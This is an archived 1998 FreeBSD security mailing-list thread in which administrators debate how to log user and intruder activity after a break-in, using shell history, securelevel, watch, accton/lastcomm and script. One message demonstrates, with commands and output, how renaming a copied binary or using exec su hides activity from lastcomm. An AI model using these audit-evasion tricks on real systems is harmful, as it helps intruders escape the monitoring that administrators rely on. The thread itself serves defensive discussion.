It will listen on a port >>and upon connect will drop you in to shell as root. Please do: >> >># netstat -an | grep LIST >> >>and check to make sure you know what all the ports are. If I'd be you I'd >>re-install since who knows what you at going with crontab, at, mail >>aliases, etc. >> >>-- Yan >> >>www.best.com/~jkb/ Unix users of the world unite: >>www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com >>"Turn up the lights, I don't want to go home in the dark." >> > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 20:27:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA08212 for freebsd-security-outgoing; Thu, 27 Aug 1998 20:27:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tasam.com (tasam.com [198.232.144.22]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA08158 for ; Thu, 27 Aug 1998 20:26:45 -0700 (PDT) (envelope-from clash@tasam.com) Received: from bug (bug.tasam.com [198.232.144.254]) by tasam.com (8.9.1/8.9.1) with SMTP id XAA07956; Thu, 27 Aug 1998 23:25:15 -0400 (EDT) Message-ID: <00bb01bdd233$76594990$f10408d1@bug.tasam.com> From: "Joe Gleason" To: "Wilson MacGyver" , , "Brian Behlendorf" Subject: Re: post breakin log Date: Thu, 27 Aug 1998 23:23:53 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2110.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You could always make a custom bash that sends each command to syslog as it is done. ;-) Then you could have your syslog log it to a remote system. 
Joe Gleason Tasam >At 01:38 AM 8/27/98 -0400, Wilson MacGyver wrote: >>the log from history follows. > >Is there a fool-proof way to get user histories like this? I got one once >only because the cracker was lame enough to forget to delete his >.bash_history file. Presuming root isn't compromised of course... > > Brian > > >--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-- >"Common sense is the collection of prejudices | brian@apache.org >acquired by the age of eighteen." - Einstein | brian@hyperreal.org > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 21:57:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA21902 for freebsd-security-outgoing; Thu, 27 Aug 1998 21:57:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA21895; Thu, 27 Aug 1998 21:56:53 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id VAA28120; Thu, 27 Aug 1998 21:55:59 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Thu, 27 Aug 1998 21:55:59 -0700 (PDT) From: "Jan B. 
Koum " X-Sender: jkb@shell6.ba.best.com To: Gary Palmer cc: Brian Behlendorf , Wilson MacGyver , security@FreeBSD.ORG Subject: Shell history (Was: Re: post breakin log) In-Reply-To: <1652.904271528@gjp.erols.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is assuming intruder will not try to change shell, turn off history within the shell and is in general pretty clueless when it comes to shell history. :) A friend of mine came up with an idea to create a shell which would log everything a user does.. not via shell history mechanism, but rather ala watch(8). Everything user types would go into some files somewhere. Then again, nothing ever came out of it. -- Yan www.best.com/~jkb/ Unix users of the world unite: www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com "Turn up the lights, I don't want to go home in the dark." On Thu, 27 Aug 1998, Gary Palmer wrote: >Brian Behlendorf wrote in message ID ><19980827182323.6798.qmail@hyperreal.org>: >> Is there a fool-proof way to get user histories like this? I got one once >> only because the cracker was lame enough to forget to delete his >> .bash_history file. Presuming root isn't compromised of course... > >Force the history files to be created with uappend flag set and run with a non >zero security level. > >Gary >-- >Gary Palmer FreeBSD Core Team Member >FreeBSD: Turning PC's into workstations. 
See http://www.FreeBSD.ORG/ for info > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 22:09:37 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA23046 for freebsd-security-outgoing; Thu, 27 Aug 1998 22:09:37 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA23041 for ; Thu, 27 Aug 1998 22:09:35 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id WAA29901; Thu, 27 Aug 1998 22:08:37 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Thu, 27 Aug 1998 22:08:36 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: Joe Gleason cc: Wilson MacGyver , security@FreeBSD.ORG, Brian Behlendorf Subject: Shell history (Was: Re: post breakin log) In-Reply-To: <00bb01bdd233$76594990$f10408d1@bug.tasam.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What if the user would be to switch shell or to install their own? I do not think one should depend on shell history to log all what user does. Best way to implement something like watch(8) to check the ttys you want or to automatically start when someone attaches to a tty. Again, this is also flawed.. what if someone simply continues to use root shell they got through a popper overflow? No tty, no entry in wtmp... have fun getting their command history. But wait... tcpdump. Using something like NFR to capture the session for you should work unless something like ssh is used. Ideas? 
Opinions? Flames? How would YOU monitor what your users are doing if you had to? -- Yan www.best.com/~jkb/ Unix users of the world unite: www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com "Turn up the lights, I don't want to go home in the dark." On Thu, 27 Aug 1998, Joe Gleason wrote: >You could always make a custom bash that sends each command to syslog as it >is done. ;-) > >Then you could have your syslog log it to a remote system. > >Joe Gleason >Tasam > > >>At 01:38 AM 8/27/98 -0400, Wilson MacGyver wrote: >>>the log from history follows. >> >>Is there a fool-proof way to get user histories like this? I got one once >>only because the cracker was lame enough to forget to delete his >>.bash_history file. Presuming root isn't compromised of course... >> >> Brian >> >> >>--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-- >>"Common sense is the collection of prejudices | brian@apache.org >>acquired by the age of eighteen." - Einstein | brian@hyperreal.org >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message >> > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 22:17:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA23916 for freebsd-security-outgoing; Thu, 27 Aug 1998 22:17:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tasam.com (tasam.com [198.232.144.22]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA23905 for ; Thu, 27 Aug 1998 22:17:27 -0700 (PDT) (envelope-from clash@tasam.com) Received: from bug (bug.tasam.com [198.232.144.254]) by tasam.com (8.9.1/8.9.1) with SMTP id BAA28628; Fri, 28 Aug 1998 01:16:31 -0400 (EDT) Message-ID: 
<002001bdd242$f1e3baf0$f10408d1@bug.tasam.com> From: "Joe Gleason" To: "Jan B. Koum " Cc: Subject: Re: Shell history (Was: Re: post breakin log) Date: Fri, 28 Aug 1998 01:15:46 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2110.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I don't know that much kernel stuff, but what if you hacked the kernel so that whatever syscall opens/forks a new process will log the process name and parameters? That and having watch running, telling it to restart on reconnect to a tty and be watching each tty that way should give you lots of data. I think the best security measure would be a custom compiles who and or w command that logs if anyone uses it more that once per 20 seconds. You can always tell if someone is up to something by their use of the who command. ;-) Joe Gleason Tasam > > What if the user would be to switch shell or to install their own? > > I do not think one should depend on shell history to log all what > user does. Best way to implement something like watch(8) to check > the ttys you want or to automatically start when someone attaches > to a tty. Again, this is also flawed.. what if someone simply > continues to use root shell they got through a popper overflow? > No tty, no entry in wtmp... have fun getting their command > history. But wait... tcpdump. Using something like NFR to capture > the session for you should work unless something like ssh is used. > > Ideas? Opinions? Flames? How would YOU monitor what your users are > doing if you had to? > >-- Yan > >www.best.com/~jkb/ Unix users of the world unite: >www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com >"Turn up the lights, I don't want to go home in the dark." 
> >On Thu, 27 Aug 1998, Joe Gleason wrote: > >>You could always make a custom bash that sends each command to syslog as it >>is done. ;-) >> >>Then you could have your syslog log it to a remote system. >> >>Joe Gleason >>Tasam >> >> >>>At 01:38 AM 8/27/98 -0400, Wilson MacGyver wrote: >>>>the log from history follows. >>> >>>Is there a fool-proof way to get user histories like this? I got one once >>>only because the cracker was lame enough to forget to delete his >>>.bash_history file. Presuming root isn't compromised of course... >>> >>> Brian >>> >>> >>>--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-- >>>"Common sense is the collection of prejudices | brian@apache.org >>>acquired by the age of eighteen." - Einstein | brian@hyperreal.org >>> >>>To Unsubscribe: send mail to majordomo@FreeBSD.org >>>with "unsubscribe freebsd-security" in the body of the message >>> >> >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message >> > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 22:21:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA24449 for freebsd-security-outgoing; Thu, 27 Aug 1998 22:21:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from henry.cs.adfa.oz.au (henry.cs.adfa.oz.au [131.236.21.158]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA24433 for ; Thu, 27 Aug 1998 22:20:55 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.oz.au) Received: (from wkt@localhost) by henry.cs.adfa.oz.au (8.7.5/8.7.3) id PAA04932; Fri, 28 Aug 1998 15:19:59 +1000 (EST) From: Warren Toomey Message-Id: <199808280519.PAA04932@henry.cs.adfa.oz.au> Subject: Re: Shell history To: jkb@best.com (Jan B. Koum) Date: Fri, 28 Aug 1998 15:19:59 +1000 (EST) Cc: security@FreeBSD.ORG In-Reply-To: from "Jan B. 
Koum" at "Aug 27, 98 10:08:36 pm" Reply-To: wkt@cs.adfa.oz.au X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article by Jan B. Koum: > What if the user would be to switch shell or to install their own? > I do not think one should depend on shell history to log all what > user does. How would YOU monitor what your users are > doing if you had to? accton(8), lastcomm(1) Warren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 22:33:15 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA25472 for freebsd-security-outgoing; Thu, 27 Aug 1998 22:33:15 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA25467 for ; Thu, 27 Aug 1998 22:33:13 -0700 (PDT) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id XAA02314; Thu, 27 Aug 1998 23:32:07 -0600 (MDT) Message-Id: <199808280532.XAA02314@lariat.lariat.org> X-Sender: brett@mail.lariat.org X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1.0.49 (Beta) Date: Thu, 27 Aug 1998 23:30:58 -0600 To: "Joe Gleason" , "Jan B. Koum " From: Brett Glass Subject: Re: Shell history (Was: Re: post breakin log) Cc: In-Reply-To: <002001bdd242$f1e3baf0$f10408d1@bug.tasam.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:15 AM 8/28/98 -0400, Joe Gleason wrote: >I think the best security measure would be a custom compiles who and or w >command that logs if anyone uses it more that once per 20 seconds. 
You can >always tell if someone is up to something by their use of the who command. That'd be me, the sysadmin. ;-) --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 22:44:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA26834 for freebsd-security-outgoing; Thu, 27 Aug 1998 22:44:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA26825 for ; Thu, 27 Aug 1998 22:44:27 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id WAA06398; Thu, 27 Aug 1998 22:43:19 -0700 (PDT) Message-Id: <199808280543.WAA06398@burka.rdy.com> Subject: Re: Shell history In-Reply-To: <199808280519.PAA04932@henry.cs.adfa.oz.au> from Warren Toomey at "Aug 28, 1998 3:19:59 pm" To: wkt@cs.adfa.oz.au Date: Thu, 27 Aug 1998 22:43:19 -0700 (PDT) Cc: jkb@best.com, security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warren Toomey writes: > In article by Jan B. Koum: > > What if the user would be to switch shell or to install their own? > > I do not think one should depend on shell history to log all what > > user does. How would YOU monitor what your users are > > doing if you had to? > > accton(8), lastcomm(1) It won't tell you much. Not in its' current state. It would be a good idea to extend acct to log everything, including program switches and (possibly) some stuff from the enviroment. Also it would be a good idea to be able to log information on per-user basis. 
> > Warren > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 23:07:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA29362 for freebsd-security-outgoing; Thu, 27 Aug 1998 23:07:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA29353 for ; Thu, 27 Aug 1998 23:06:55 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id XAA06690; Thu, 27 Aug 1998 23:05:57 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Thu, 27 Aug 1998 23:05:56 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: wkt@cs.adfa.oz.au cc: security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: <199808280519.PAA04932@henry.cs.adfa.oz.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 28 Aug 1998, Warren Toomey wrote: >In article by Jan B. Koum: >> What if the user would be to switch shell or to install their own? >> I do not think one should depend on shell history to log all what >> user does. How would YOU monitor what your users are >> doing if you had to? > > accton(8), lastcomm(1) > > Warren > Once can just "cp" the executable. 
% cp /sbin/ifconfig ./.a % ./.a -a vx0: flags=8843 mtu 1500 inet 192.168.1.2 netmask 0xffffff00 broadcast 192.168.1.255 ether 00:60:08:15:bc:65 lp0: flags=8810 mtu 1500 tun0: flags=8010 mtu 1500 lo0: flags=8049 mtu 16384 inet 127.0.0.1 netmask 0xff000000 % lastcomm | grep ifconfig % lastcomm | grep .a lastcomm - jkb ttyp3 0.00 secs Thu Aug 27 22:56 .a - jkb ttyp3 0.00 secs Thu Aug 27 22:56 And if the binary is setuid... exec: % exec su Password: nfr# lastcomm hostname - root ttyp3 0.00 secs Thu Aug 27 22:52 lastcomm -S root ttyp2 0.00 secs Thu Aug 27 22:52 lastcomm -S root ttyp2 0.00 secs Thu Aug 27 22:52 vi - jkb ttyp3 0.03 secs Thu Aug 27 22:52 lastcomm -S root ttyp2 0.00 secs Thu Aug 27 22:51 I am sure there are probably many other ways around lastcomm. I hope you are not relaying 100% on the output of lastcomm to tell you what users are up to. -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 00:56:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA12963 for freebsd-security-outgoing; Fri, 28 Aug 1998 00:56:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA12957 for ; Fri, 28 Aug 1998 00:56:20 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id IAA12171 for ; Fri, 28 Aug 1998 08:55:25 +0100 (BST) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id IAA13224 for ; Fri, 28 Aug 1998 08:55:24 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Fri, 28 Aug 1998 08:55:24 +0100 (BST) From: Jay Tribick X-Sender: netadmin@na.nu.na.nu To: security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: 
<199808280543.WAA06398@burka.rdy.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | > > What if the user would be to switch shell or to install their own? | > > I do not think one should depend on shell history to log all what | > > user does. How would YOU monitor what your users are | > > doing if you had to? | > | > accton(8), lastcomm(1) | | It won't tell you much. Not in its' current state. It would be a good idea | to extend acct to log everything, including program switches and (possibly) | some stuff from the enviroment. Also it would be a good idea to be able | to log information on per-user basis. Could we not modify the [kernel] to log all activity on the ttyp's to a file? Regards, Jay Tribick -- [| Network Administrator | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact information |] [| T: +44 (0)1273 677633 F: +44 (0)1273 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 01:15:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA15517 for freebsd-security-outgoing; Fri, 28 Aug 1998 01:15:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA15512 for ; Fri, 28 Aug 1998 01:15:53 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id BAA07281; Fri, 28 Aug 1998 01:14:53 -0700 (PDT) Message-Id: <199808280814.BAA07281@burka.rdy.com> Subject: Re: Shell history In-Reply-To: from Jay Tribick at "Aug 28, 1998 8:55:24 am" To: netadmin@fastnet.co.uk (Jay Tribick) Date: Fri, 28 Aug 1998 01:14:53 -0700 (PDT) Cc: security@FreeBSD.ORG X-Class: Fast 
Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jay Tribick writes: > > | > > What if the user would be to switch shell or to install their own? > | > > I do not think one should depend on shell history to log all what > | > > user does. How would YOU monitor what your users are > | > > doing if you had to? > | > > | > accton(8), lastcomm(1) > | > | It won't tell you much. Not in its' current state. It would be a good idea > | to extend acct to log everything, including program switches and (possibly) > | some stuff from the enviroment. Also it would be a good idea to be able > | to log information on per-user basis. > > Could we not modify the [kernel] to log all activity on the ttyp's to > a file? Yeah. You'll need to modify telnetd/rlogind/sshd/etc to do it. 
> > Regards, > > Jay Tribick > -- > [| Network Administrator | FastNet International | http://fast.net.uk/ |] > [| Finger netadmin@fastnet.co.uk for contact information |] > [| T: +44 (0)1273 677633 F: +44 (0)1273 621631 e: netadmin@fast.net.uk |] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 01:32:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA17293 for freebsd-security-outgoing; Fri, 28 Aug 1998 01:32:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c079.moon.jic.com [206.156.18.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA17288 for ; Fri, 28 Aug 1998 01:32:19 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (gjp@localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id EAA06488; Fri, 28 Aug 1998 04:31:16 -0400 (EDT) (envelope-from gjp@gjp.erols.com) X-Mailer: exmh version 2.0.1 12/23/97 To: "Jan B. Koum " cc: Brian Behlendorf , Wilson MacGyver , security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: Shell history (Was: Re: post breakin log) In-reply-to: Your message of "Thu, 27 Aug 1998 21:55:59 PDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 28 Aug 1998 04:31:16 -0400 Message-ID: <6484.904293076@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jan B. Koum " wrote in message ID : > > This is assuming intruder will not try to change shell, turn off > history within the shell and is in general pretty clueless when it comes > to shell history. :) Don't install shells on your system then that don't have this feature. Its pretty simple :) I doubt hany hacker is gonna recompile the shell... 
Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 01:35:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA17579 for freebsd-security-outgoing; Fri, 28 Aug 1998 01:35:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA17561 for ; Fri, 28 Aug 1998 01:35:45 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id KAA18557 for freebsd.org!freebsd-security; Fri, 28 Aug 1998 10:34:50 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id KAA00493 for freebsd-security@freebsd.org; Fri, 28 Aug 1998 10:32:07 +0200 (CEST) (envelope-from zgabor) From: Zahemszky Gabor Message-Id: <199808280832.KAA00493@CoDe.hu> Subject: Re: post breakin log In-Reply-To: <1652.904271528@gjp.erols.com> from Gary Palmer at "Aug 27, 98 10:32:08 pm" To: freebsd.org!freebsd-security@zg.CoDe.hu Date: Fri, 28 Aug 1998 10:32:07 +0200 (CEST) X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Brian Behlendorf wrote in message ID > <19980827182323.6798.qmail@hyperreal.org>: > > Is there a fool-proof way to get user histories like this? I got one once > > only because the cracker was lame enough to forget to delete his > > .bash_history file. Presuming root isn't compromised of course... > > Force the history files to be created with uappend flag set and run with a non > zero security level. Please! What is the correct way to change security-level? 
Where can I do it? Yes, I know that in rc*, but which? And where? ZGabor at CoDe dot HU -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 01:35:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA17585 for freebsd-security-outgoing; Fri, 28 Aug 1998 01:35:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA17562 for ; Fri, 28 Aug 1998 01:35:45 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id KAA18560; Fri, 28 Aug 1998 10:34:51 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id KAA00469; Fri, 28 Aug 1998 10:20:51 +0200 (CEST) (envelope-from zgabor) From: Zahemszky Gabor Message-Id: <199808280820.KAA00469@CoDe.hu> Subject: Re: Shell history (Was: Re: post breakin log) In-Reply-To: from "Jan B. Koum" at "Aug 27, 98 09:55:59 pm" To: freebsd.org!freebsd-security@zg.CoDe.hu Date: Fri, 28 Aug 1998 10:20:51 +0200 (CEST) Cc: best.com!jkb@zg.CoDe.hu X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > This is assuming intruder will not try to change shell, turn off > history within the shell and is in general pretty clueless when it comes > to shell history. 
:)
> A friend of mine came up with an idea to create a shell which
> would log everything a user does.. not via shell history mechanism, but
> rather ala watch(8). Everything user types would go into some files
> somewhere. Then again, nothing ever came out of it.

man script

ZGabor at CoDe dot HU

--
#!/bin/ksh
Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X"

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Aug 28 02:02:09 1998
From: Jay Tribick
Date: Fri, 28 Aug 1998 10:01:04 +0100 (BST)
To: security@FreeBSD.ORG
Subject: Re: Shell history
